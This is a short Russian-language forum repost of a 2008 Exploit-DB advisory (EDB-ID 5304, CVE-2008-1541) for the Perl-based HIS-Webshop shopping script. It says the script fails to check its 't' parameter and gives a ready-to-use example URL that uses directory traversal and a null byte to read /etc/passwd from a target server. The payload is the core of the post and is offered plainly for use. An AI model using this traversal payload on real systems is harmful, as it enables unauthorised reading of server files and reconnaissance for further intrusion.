Exploit HIS-Webshop - 'his-webshop.pl t' Remote File Disclosure

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
5304
Проверка EDB
  1. Пройдено
Автор
ZERO X
Тип уязвимости
WEBAPPS
Платформа
CGI
CVE
cve-2008-1541
Дата публикации
2008-03-24
Код:
HIS-Webshop is a shopping-system written in Perl by www.shoppark.de
The script doesn´t check the "t"-parameter.

Example:
http://server.com/cgi-bin/his-webshop.pl?t=../../../../../../../../etc/passwd%00

<< Greetz Zero X >>

# milw0rm.com [2008-03-24]
 
Источник
www.exploit-db.com

Похожие темы